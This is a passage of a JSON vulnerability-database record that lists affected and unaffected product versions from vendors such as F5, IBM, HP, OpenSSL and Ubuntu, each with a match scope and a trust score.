        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip gtm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "project openssl 1.0.0d",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "project openssl 1.0.1e",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "insight orchestration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.2"
      },
      {
        "model": "big-ip apm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "big-ip pem hf5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "informix genero",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.41"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3"
      },
      {
        "model": "big-ip webaccelerator hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.5"
      },
      {
        "model": "big-ip gtm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.4"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.8.780"
      },
      {
        "model": "big-ip link controller",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "project openssl 1.0.1a",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "insight orchestration",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.0"
      },
      {
        "model": "project openssl b",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.2.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.6"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.0.1"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.4"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "aspera shares",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "1.7.5"
      },
      {
        "model": "version control agent",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.0"
      },
      {
        "model": "big-ip link controller hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "cms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "17.0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.0.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.2"
      },
      {
        "model": "abyp-4tl-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.15"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.2"
      },
      {
        "model": "infosphere information server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "11.3"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.2.0"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.1209"
      },
      {
        "model": "project openssl k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.24"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.0.4"
      },
      {
        "model": "project openssl 1.0.2a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "systems insight manager 7.3.0a",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "project openssl 1.0.0g",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.3"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "workload deployer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.16"
      },
      {
        "model": "tivoli workload scheduler for applications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "tivoli netcool/reporter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.8"
      },
      {
        "model": "vios fp-25 sp-02",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.4"
      },
      {
        "model": "endeca server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "7.6.1.0.0"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0"
      },
      {
        "model": "big-iq device",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.5"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3361"
      },
      {
        "model": "sterling integrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1"
      },
      {
        "model": "big-ip ltm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip analytics hf15",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.1"
      },
      {
        "model": "big-iq device",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.7"
      },
      {
        "model": "sametime",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.0.1"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.2"
      },
      {
        "model": "project openssl 0.9.8zb",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.0"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "netscaler t1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.1.0.842"
      },
      {
        "model": "big-ip edge gateway 11.1.0-hf2",
        "scope": null,
        "trust": 0.3,
        "vendor": "f5",
        "version": null
      },
      {
        "model": "big-ip asm hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.0.0"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.3.0.870"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.0.2-77"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "big-ip aam hf9",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip edge gateway hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.17"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.1"
      },
      {
        "model": "big-ip apm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "image construction and composition tool",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3.1.0"
      },
      {
        "model": "project openssl 1.0.1m",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "linerate",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "2.4.2"
      },
      {
        "model": "big-iq adc hf3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.5"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.0.0.840"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.4"
      },
      {
        "model": "systems insight manager sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5.0"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.3.0"
      },
      {
        "model": "big-ip pem",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "infinity",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "pexip",
        "version": "5.0"
      },
      {
        "model": "project openssl 1.0.0r",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.0.2.77"
      },
      {
        "model": "project openssl 0.9.8w",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "system storage san48b-5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0"
      },
      {
        "model": "service delivery manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.1"
      },
      {
        "model": "tivoli workload scheduler for applications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.4"
      },
      {
        "model": "big-ip psm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.27"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.11"
      },
      {
        "model": "project openssl 1.0.0m",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.2.27"
      },
      {
        "model": "big-ip aam",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "sterling connect:express for unix ifix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.0.11150-11"
      },
      {
        "model": "big-ip asm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "rational application developer for websphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0"
      },
      {
        "model": "business server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.8"
      },
      {
        "model": "project openssl 1.0.1g",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.0.4"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5.0"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.1.1"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "enterprise manager ops center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "11.1"
      },
      {
        "model": "project openssl 0.9.8m",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "aura experience portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "infinity",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "pexip",
        "version": "2.0"
      },
      {
        "model": "project openssl j",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "qlogic 8gb intelligent pass-thru module \u0026 san switch module",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.10.1.31.00"
      },
      {
        "model": "rational application developer for websphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "command center appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "workload deployer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.0.96"
      },
      {
        "model": "aspera shares",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "1.0.1"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.2.4"
      },
      {
        "model": "bladecenter -t",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8720"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.3.23"
      },
      {
        "model": "big-ip apm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.5"
      },
      {
        "model": "big-ip ltm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.0.2"
      },
      {
        "model": "big-ip analytics",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "big-ip webaccelerator hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.2.1"
      },
      {
        "model": "tivoli common reporting",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.1.2"
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.1"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.3"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.6.156"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.2.0"
      },
      {
        "model": "initiate master data service patient hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "netscaler gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "project openssl 1.0.1i",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.12"
      },
      {
        "model": "enterprise manager ops center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "11.1.3"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.913"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3"
      },
      {
        "model": "alienvault",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.13"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2"
      },
      {
        "model": "project openssl 1.0.0h",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "sdk for node.js",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.13"
      },
      {
        "model": "infosphere guardium database activity monitoring",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "infosphere master data management patient hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.0"
      },
      {
        "model": "arx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "6.0"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.5"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.10"
      },
      {
        "model": "sametime unified telephony",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.0.0"
      },
      {
        "model": "sterling connect:express for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.6"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.6"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "14.10"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "2.1"
      },
      {
        "model": "big-ip asm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "alienvault",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.12"
      },
      {
        "model": "flex system en4023 10gb scalable switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0"
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.4.1"
      },
      {
        "model": "flex system fc5022 16gb san scalable switch 7.2.1c",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.211"
      },
      {
        "model": "bladecenter -s",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8886"
      },
      {
        "model": "cognos controller if4",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.10"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.9"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "enterprise manager ops center",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "12.2"
      },
      {
        "model": "real-time compression appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.9"
      },
      {
        "model": "arx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "6.4"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.7"
      },
      {
        "model": "project openssl 0.9.8r",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.21"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "algo one pcre",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.7"
      },
      {
        "model": "aspera ondemand",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.5"
      },
      {
        "model": "big-ip analytics hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.1"
      },
      {
        "model": "big-iq security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.5"
      },
      {
        "model": "big-ip link controller hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.16"
      },
      {
        "model": "aspera faspex",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.0.3"
      },
      {
        "model": "big-ip afm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "project openssl 0.9.8n",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.14"
      },
      {
        "model": "virtual connect enterprise manager sdk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4"
      },
      {
        "model": "abyp-2t-1s-1l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "big-ip edge gateway hf15",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "security network intrusion prevention system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.2.0.820"
      },
      {
        "model": "aspera console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "2.5.3"
      },
      {
        "model": "sametime",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.2.1"
      },
      {
        "model": "security network controller 1.0.3350m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "big-ip link controller hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "project openssl 0.9.8y",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "big-ip edge gateway 10.2.3-hf1",
        "scope": null,
        "trust": 0.3,
        "vendor": "f5",
        "version": null
      },
      {
        "model": "arx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "6.3"
      },
      {
        "model": "aspera connect server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.5.4"
      },
      {
        "model": "icewall sso agent option",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.02007"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.3"
      },
      {
        "model": "websphere mq",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.3"
      },
      {
